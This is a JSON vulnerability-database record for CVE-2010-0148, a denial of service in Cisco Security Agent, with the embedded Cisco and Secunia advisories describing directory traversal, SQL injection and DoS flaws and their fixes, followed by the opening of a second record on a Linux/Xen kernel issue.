            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.8,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2010-0148",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-42753",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2010-0148",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201002-235",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-42753",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42753"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003783"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0148"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-235"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Unspecified vulnerability in Cisco Security Agent 5.2 before 5.2.0.285, when running on Linux, allows remote attackers to cause a denial of service (kernel panic) via \"a series of TCP packets.\". The Cisco Security Agent is prone to a denial-of-service vulnerability. This issue is tracked by Cisco Bug ID CSCtb89870. \nAn attacker can exploit this issue to cause the vulnerable computer to crash, denying service to legitimate users. \nCisco Security Agent 5.2 for Windows and Linux is vulnerable. Cisco Security Agent adopts behavior-based evaluation criteria to identify and protect servers and terminal computers, instead of relying only on signature matching for analysis and identification, successfully solving the security risks brought by unknown viruses. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nCisco Security Advisory: Multiple Vulnerabilities in Cisco Security\nAgent\n\nAdvisory ID: cisco-sa-20100217-csa\n\nRevision 1.0\n\nFor Public Release 2010 February 17 1600 UTC (GMT)\n\n+---------------------------------------------------------------------\n\nSummary\n=======\n\nThe Management Center for Cisco Security Agents is affected by a\ndirectory traversal vulnerability and a SQL injection vulnerability. \nSuccessful exploitation of the directory traversal vulnerability may\nallow an authenticated attacker to view and download arbitrary files\nfrom the server hosting the Management Center. Successful\nexploitation of the SQL injection vulnerability may allow an\nauthenticated attacker to execute SQL statements that can cause\ninstability of the product or changes in the configuration. Repeated exploitation could result in a sustained DoS\ncondition. \n\nThese vulnerabilities are independent of each other. \n\nCisco has released free software updates that address these\nvulnerabilities. \n\nThis advisory is posted at:\n\nhttp://www.cisco.com/warp/public/707/cisco-sa-20100217-csa.shtml\n\nAffected Products\n=================\n\nVulnerable Products\n+------------------\n\nCisco Security Agent releases 5.1, 5.2 and 6.0 are affected by the\nSQL injection vulnerability. \n\nNote: Only the Management Center for Cisco Security Agents is\naffected by the directory traversal and SQL injection\nvulnerabilities. The agents installed on user end-points are not\naffected. \n\nStandalone agents are installed in the following products:\n\n * Cisco Unified Communications Manager (CallManager)\n * Cisco Conference Connection (CCC)\n * Emergency Responder\n * IPCC Express\n * IPCC Enterprise\n * IPCC Hosted\n * IP Interactive Voice Response (IP IVR)\n * IP Queue Manager\n * Intelligent Contact Management (ICM)\n * Cisco Voice Portal (CVP)\n * Cisco Unified Meeting Place\n * Cisco Personal Assistant (PA)\n * Cisco Unity\n * Cisco Unity Connection\n * Cisco Unity Bridge\n * Cisco Secure ACS Solution Engine\n * Cisco Internet Service Node (ISN)\n * Cisco Security Manager (CSM)\n\nNote: The Sun Solaris version of the Cisco Security Agent is not\naffected by these vulnerabilities. \n\nNo other Cisco products are currently known to be affected by these\nvulnerabilities. \n\nManagement Center for Cisco Security Agents Directory Traversal Vulnerability\n+----------------------------------------------------------------------------\n\nThe Management Center for Cisco Security Agents is affected by a\ndirectory traversal vulnerability that may allow an authenticated\nattacker to view and download arbitrary files from the server that is\nhosting the Management Center for Cisco Security Agents. \n\nManagement Center for Cisco Security Agents SQL Injection Vulnerability\n+----------------------------------------------------------------------\n\nThe Management Center for Cisco Security Agents is also affected by a\nSQL injection vulnerability that may allow an authenticated attacker\nto execute SQL statements that can cause the Management Center for\nCisco Security Agents to become unstable or modify its configuration. \nThese configuration changes may result in modifications to the\nsecurity policies of the endpoints. Additionally, an attacker may\ncreate, delete, or modify management user accounts that are found in\nthe Management Center for Cisco Security Agents. \n\nVulnerability Scoring Details \n=============================\n\nCisco has provided scores for the vulnerabilities in this advisory\nbased on the Common Vulnerability Scoring System (CVSS). The CVSS\nscoring in this Security Advisory is done in accordance with CVSS\nversion 2.0. \n\nCVSS is a standards-based scoring method that conveys vulnerability\nseverity and helps determine urgency and priority of response. \n\nCisco has provided a base and temporal score. Customers can then\ncompute environmental scores to assist in determining the impact of\nthe vulnerability in individual networks. \n\nCisco has provided an FAQ to answer additional questions regarding\nCVSS at:\n\nhttp://www.cisco.com/web/about/security/intelligence/cvss-qandas.html\n\nCisco has also provided a CVSS calculator to help compute the\nenvironmental impact for individual networks at:\n\nhttp://intellishield.cisco.com/security/alertmanager/cvss\n\nCSCtd73275 - Directory Traversal in the Management Center for Cisco Security Agents\n\nCVSS Base Score - 6.8\n\nAccess Vector           - Network\nAccess Complexity       - Low\nAuthentication          - Single\nConfidentiality Impact  - Complete\nIntegrity Impact        - None\nAvailability Impact     - None\n\nCVSS Temporal Score - 5.9\n\nExploitability          - High\nRemediation Level       - Official-Fix\nReport Confidence       - Confirmed\n\nCSCtd73290 - Management Center for Cisco Security Agents: SQL Injection\n \nCVSS Base Score - 9\n\nAccess Vector           - Network\nAccess Complexity       - Low\nAuthentication          - Single\nConfidentiality Impact  - Complete\nIntegrity Impact        - Complete\nAvailability Impact     - Complete\n\nCVSS Temporal Score - 7.4\n\nExploitability          - Functional\nRemediation Level       - Official-Fix\nReport Confidence       - Confirmed\n\nCSCtb89870 - Kernel Panic When Receiving Certain TCP Packets\n\nCVSS Base Score - 7.8\n\nAccess Vector           - Network\nAccess Complexity       - Low\nAuthentication          - None\nConfidentiality Impact  - None\nIntegrity Impact        - None\nAvailability Impact     - Complete\n\nCVSS Temporal Score - 6.4\n\nExploitability          - Functional\nRemediation Level       - Official-Fix\nReport Confidence       - Confirmed\n\nImpact\n======\n\nSuccessful exploitation of the directory traversal vulnerability may\nallow an authenticated attacker to view and download arbitrary files\nfrom the server that is hosting the Management Center for Cisco\nSecurity Agents. \n\nSuccessful exploitation of the SQL injection vulnerability may allow\nan authenticated attacker to execute SQL statements that can cause\nthe Management Center for Cisco Security Agents to become unstable or\nmodify its configuration. Repeated exploitation could\nresult in a sustained DoS condition. \n\nSoftware Versions and Fixes\n===========================\n\nWhen considering software upgrades, also consult\nhttp://www.cisco.com/go/psirt and any subsequent advisories to\ndetermine exposure and a complete upgrade solution. \n\nIn all cases, customers should exercise caution to be certain the\ndevices to be upgraded contain sufficient memory and that current\nhardware and software configurations will continue to be supported\nproperly by the new release. If the information is not clear, contact\nthe Cisco Technical Assistance Center (TAC) or your contracted\nmaintenance provider for assistance. \n\n+-----------------------------------------------------+\n|               | Cisco    | First      |             |\n| Vulnerability | Security | Fixed      | Recommended |\n|               | Agent    | Version    | Release     |\n|               | Release  |            |             |\n|---------------+----------+------------+-------------|\n|               | 5.1      | Not        | Not         |\n|               |          | vulnerable | vulnerable  |\n|Directory      |----------+------------+-------------|\n| Traversal     | 5.2      | Not        | Not         |\n| Vulnerability |          | vulnerable | vulnerable  |\n|               |----------+------------+-------------|\n|               | 6.0      | 6.0.1.132  | 6.0.1.132   |\n|---------------+----------+------------+-------------|\n|               | 5.1      | 5.1.0.117  | 5.1.0.117   |\n|SQL Injection  |----------+------------+-------------|\n| Vulnerability | 5.2      | 5.2.0.296  | 5.2.0.296   |\n|               |----------+------------+-------------|\n|               | 6.0      | 6.0.1.132  | 6.0.1.132   |\n|---------------+----------+------------+-------------|\n|               | 5.1      | Not        | 5.1.0.117   |\n|               |          | vulnerable |             |\n|Denial of      |----------+------------+-------------|\n| Service       | 5.2      | 5.2.0.285  | 5.2.0.296   |\n|Vulnerability  |----------+------------+-------------|\n|               | 6.0      | Not        | 6.0.1.132   |\n|               |          | vulnerable |             |\n+-----------------------------------------------------+\n\nCisco CSA software can be downloaded from the following link:\n\nhttp://tools.cisco.com/support/downloads/go/Redirect.x?mdfid=278065206\n\nWorkarounds\n===========\n\nThere are no workarounds available to mitigate these vulnerabilities. \n\nAdditional mitigations that can be deployed on Cisco devices within\nthe network are available in the Cisco Applied Intelligence companion\ndocument for this Advisory:\n\nhttp://www.cisco.com/warp/public/707/cisco-amb-20100217-csa.shtml\n\nObtaining Fixed Software\n========================\n\nCisco has released free software updates that address these\nvulnerabilities. Prior to deploying software, customers should\nconsult their maintenance provider or check the software for feature\nset compatibility and known issues specific to their environment. \n\nCustomers may only install and expect support for the feature sets\nthey have purchased. By installing, downloading, accessing or\notherwise using such software upgrades, customers agree to be bound\nby the terms of Cisco\u0027s software license terms found at:\n\nhttp://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html\n\nor as otherwise set forth at Cisco.com Downloads at:\n\nhttp://www.cisco.com/public/sw-center/sw-usingswc.shtml\n\nDo not contact psirt@cisco.com or security-alert@cisco.com for\nsoftware upgrades. \n\nCustomers with Service Contracts\n+-------------------------------\n\nCustomers with contracts should obtain upgraded software through\ntheir regular update channels. For most customers, this means that\nupgrades should be obtained through the Software Center on Cisco\u0027s\nworldwide website at http://www.cisco.com. \n\nCustomers using Third Party Support Organizations\n+------------------------------------------------\n\nCustomers whose Cisco products are provided or maintained through\nprior or existing agreements with third-party support organizations,\nsuch as Cisco Partners, authorized resellers, or service providers\nshould contact that support organization for guidance and assistance\nwith the appropriate course of action in regards to this advisory. \n\nThe effectiveness of any workaround or fix is dependent on specific\ncustomer situations, such as product mix, network topology, traffic\nbehavior, and organizational mission. Due to the variety of affected\nproducts and releases, customers should consult with their service\nprovider or support organization to ensure any applied workaround or\nfix is the most appropriate for use in the intended network before it\nis deployed. \n\nCustomers without Service Contracts\n+----------------------------------\n\nCustomers who purchase direct from Cisco but do not hold a Cisco\nservice contract, and customers who purchase through third-party\nvendors but are unsuccessful in obtaining fixed software through\ntheir point of sale should acquire upgrades by contacting the Cisco\nTechnical Assistance Center (TAC). TAC contacts are as follows. \n\n * +1 800 553 2447 (toll free from within North America)\n * +1 408 526 7209 (toll call from anywhere in the world)\n * e-mail: tac@cisco.com\n\nCustomers should have their product serial number available and be\nprepared to give the URL of this notice as evidence of entitlement to\na free upgrade. Free upgrades for non-contract customers must be\nrequested through the TAC. \n\nRefer to:\n\nhttp://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html\n\nfor additional TAC contact information, including localized telephone\nnumbers, and instructions and e-mail addresses for use in various\nlanguages. \n\nExploitation and Public Announcements\n=====================================\n\nThe Cisco PSIRT is not aware of any public announcements or malicious\nuse of the vulnerabilities described in this advisory. \n\nThe directory traversal and SQL injection vulnerabilities were\ndiscovered and reported to Cisco by Gabriele Giuseppini from Cigital. \nCisco PSIRT appreciates the opportunity to work with researchers on\nsecurity vulnerabilities and welcomes the opportunity to review and\nassist in product reports. The DoS vulnerability was found during\ninternal testing. \n\nStatus of this Notice: FINAL\n============================\n\nTHIS DOCUMENT IS PROVIDED ON AN \"AS IS\" BASIS AND DOES NOT IMPLY ANY\nKIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF\nMERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE\nINFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS\nAT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS\nDOCUMENT AT ANY TIME. \n\nA stand-alone copy or Paraphrase of the text of this document that\nomits the distribution URL in the following section is an\nuncontrolled copy, and may lack important information or contain\nfactual errors. \n\nDistribution\n============\n\nThis advisory is posted on Cisco\u0027s worldwide website at:\n\nhttp://www.cisco.com/warp/public/707/cisco-sa-20100217-csa.shtml\n\nIn addition to worldwide web posting, a text version of this notice\nis clear-signed with the Cisco PSIRT PGP key and is posted to the\nfollowing e-mail and Usenet news recipients. \n\n * cust-security-announce@cisco.com\n * first-bulletins@lists.first.org\n * bugtraq@securityfocus.com\n * vulnwatch@vulnwatch.org\n * cisco@spot.colorado.edu\n * cisco-nsp@puck.nether.net\n * full-disclosure@lists.grok.org.uk\n * comp.dcom.sys.cisco@newsgate.cisco.com\n\nFuture updates of this advisory, if any, will be placed on Cisco\u0027s\nworldwide website, but may or may not be actively announced on\nmailing lists or newsgroups. Users concerned about this problem are\nencouraged to check the above URL for any updates. \n\nRevision History\n================\n\n+----------------------------------------+\n| Revision |                  | Initial  |\n| 1.0      | 2010-February-17 | public   |\n|          |                  | release. |\n+----------------------------------------+\n\nCisco Security Procedures\n=========================\n\nComplete information on reporting security vulnerabilities in Cisco\nproducts, obtaining assistance with security incidents, and\nregistering to receive security information from Cisco, is available\non Cisco\u0027s worldwide website at:\n\nhttp://www.cisco.com/en/US/products/products_security_vulnerability_policy.html\n\nThis includes instructions for press inquiries regarding Cisco security\nnotices. All Cisco security advisories are available at:\n\nhttp://www.cisco.com/go/psirt\n-----BEGIN PGP SIGNATURE-----\n\niD8DBQFLew9U86n/Gc8U/uARAifvAJ9oLuXJY6iy962givBVY7701k4ktACfa3wK\nO9O+Q4F1alHxm6CIbUIXkUs=\n=+hka\n-----END PGP SIGNATURE-----\n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. This can be exploited to manipulate SQL queries by\ninjecting arbitrary SQL code. \n\nNOTE: This vulnerability affects both managed and standalone\nversions. \n\nSOLUTION:\nUpdate to version 6.0.1.132, 5.1.0.117, or 5.2.0.296:\nhttp://tools.cisco.com/support/downloads/go/Redirect.x?mdfid=278065206\n\nPROVIDED AND/OR DISCOVERED BY:\n1, 2) The vendor credits Gabriele Giuseppini from Cigital. \n3) Reported by the vendor. \n\nORIGINAL ADVISORY:\nhttp://www.cisco.com/warp/public/707/cisco-sa-20100217-csa.shtml\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-0148"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003783"
      },
      {
        "db": "BID",
        "id": "38273"
      },
      {
        "db": "VULHUB",
        "id": "VHN-42753"
      },
      {
        "db": "PACKETSTORM",
        "id": "86428"
      },
      {
        "db": "PACKETSTORM",
        "id": "86630"
      }
    ],
    "trust": 2.16
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2010-0148",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "38273",
        "trust": 2.0
      },
      {
        "db": "SECUNIA",
        "id": "38619",
        "trust": 1.8
      },
      {
        "db": "SECTRACK",
        "id": "1023607",
        "trust": 1.7
      },
      {
        "db": "VUPEN",
        "id": "ADV-2010-0416",
        "trust": 1.7
      },
      {
        "db": "OSVDB",
        "id": "62445",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003783",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-235",
        "trust": 0.7
      },
      {
        "db": "CISCO",
        "id": "20100217 MULTIPLE VULNERABILITIES IN CISCO SECURITY AGENT",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "56347",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-42753",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "86428",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "86630",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42753"
      },
      {
        "db": "BID",
        "id": "38273"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003783"
      },
      {
        "db": "PACKETSTORM",
        "id": "86428"
      },
      {
        "db": "PACKETSTORM",
        "id": "86630"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0148"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-235"
      }
    ]
  },
  "id": "VAR-201002-0071",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42753"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T12:46:09.535000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "cisco-sa-20100217-csa",
        "trust": 0.8,
        "url": "http://www.cisco.com/en/us/products/csa/cisco-sa-20100217-csa.html"
      },
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "https://jp.linux.com/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003783"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-0148"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/38273"
      },
      {
        "trust": 1.7,
        "url": "http://www.cisco.com/en/us/products/products_security_advisory09186a0080b1910d.shtml"
      },
      {
        "trust": 1.7,
        "url": "http://osvdb.org/62445"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id?1023607"
      },
      {
        "trust": 1.7,
        "url": "http://secunia.com/advisories/38619"
      },
      {
        "trust": 1.7,
        "url": "http://www.vupen.com/english/advisories/2010/0416"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56347"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0148"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-0148"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/56347"
      },
      {
        "trust": 0.5,
        "url": "http://www.cisco.com/warp/public/707/cisco-sa-20100217-csa.shtml"
      },
      {
        "trust": 0.3,
        "url": "http://www.cisco.com/en/us/products/sw/secursw/ps5057/index.html"
      },
      {
        "trust": 0.2,
        "url": "http://tools.cisco.com/support/downloads/go/redirect.x?mdfid=278065206"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0147"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0148"
      },
      {
        "trust": 0.1,
        "url": "http://www.cisco.com/go/psirt"
      },
      {
        "trust": 0.1,
        "url": "http://www.cisco.com/en/us/support/tsd_cisco_worldwide_contacts.html"
      },
      {
        "trust": 0.1,
        "url": "http://www.cisco.com/en/us/products/products_security_vulnerability_policy.html"
      },
      {
        "trust": 0.1,
        "url": "http://www.cisco.com/en/us/docs/general/warranty/english/eu1ken_.html"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/"
      },
      {
        "trust": 0.1,
        "url": "http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0146"
      },
      {
        "trust": 0.1,
        "url": "http://www.cisco.com."
      },
      {
        "trust": 0.1,
        "url": "http://www.cisco.com/warp/public/707/cisco-amb-20100217-csa.shtml"
      },
      {
        "trust": 0.1,
        "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
      },
      {
        "trust": 0.1,
        "url": "http://www.cisco.com/public/sw-center/sw-usingswc.shtml"
      },
      {
        "trust": 0.1,
        "url": "http://intellishield.cisco.com/security/alertmanager/cvss"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/38619/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/blog/74"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42753"
      },
      {
        "db": "BID",
        "id": "38273"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003783"
      },
      {
        "db": "PACKETSTORM",
        "id": "86428"
      },
      {
        "db": "PACKETSTORM",
        "id": "86630"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0148"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-235"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-42753"
      },
      {
        "db": "BID",
        "id": "38273"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003783"
      },
      {
        "db": "PACKETSTORM",
        "id": "86428"
      },
      {
        "db": "PACKETSTORM",
        "id": "86630"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0148"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-235"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2010-02-23T00:00:00",
        "db": "VULHUB",
        "id": "VHN-42753"
      },
      {
        "date": "2010-02-17T00:00:00",
        "db": "BID",
        "id": "38273"
      },
      {
        "date": "2012-06-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-003783"
      },
      {
        "date": "2010-02-17T23:54:31",
        "db": "PACKETSTORM",
        "id": "86428"
      },
      {
        "date": "2010-02-24T08:40:10",
        "db": "PACKETSTORM",
        "id": "86630"
      },
      {
        "date": "2010-02-23T20:30:00.670000",
        "db": "NVD",
        "id": "CVE-2010-0148"
      },
      {
        "date": "2010-02-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201002-235"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-08-17T00:00:00",
        "db": "VULHUB",
        "id": "VHN-42753"
      },
      {
        "date": "2010-02-17T00:00:00",
        "db": "BID",
        "id": "38273"
      },
      {
        "date": "2012-06-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-003783"
      },
      {
        "date": "2017-08-17T01:31:53.460000",
        "db": "NVD",
        "id": "CVE-2010-0148"
      },
      {
        "date": "2010-02-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201002-235"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-235"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Cisco Security Agent Service disruption in  (DoS) Vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-003783"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "lack of information",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-235"
      }
    ],
    "trust": 0.6
  }
}

var-202103-1030
Vulnerability from variot

An issue was discovered in the Linux kernel 5.9.x through 5.11.3, as used with Xen. In some less-common configurations, an x86 PV guest OS user can crash a Dom0 or driver domain via a large amount of I/O activity. The issue relates to misuse of guest physical addresses when a configuration has CONFIG_XEN_UNPOPULATED_ALLOC but not CONFIG_XEN_BALLOON_MEMORY_HOTPLUG. Linux kernel 5.9.x through 5.11.3 contains a security vulnerability that could be exploited by an attacker to cause the driver to crash

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202103-1030",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.9.0"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": null
      },
      {
        "model": "cloud backup",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netapp",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "5.11.3"
      },
      {
        "model": "solidfire baseboard management controller",
        "scope": "eq",
        "trust": 1.0,
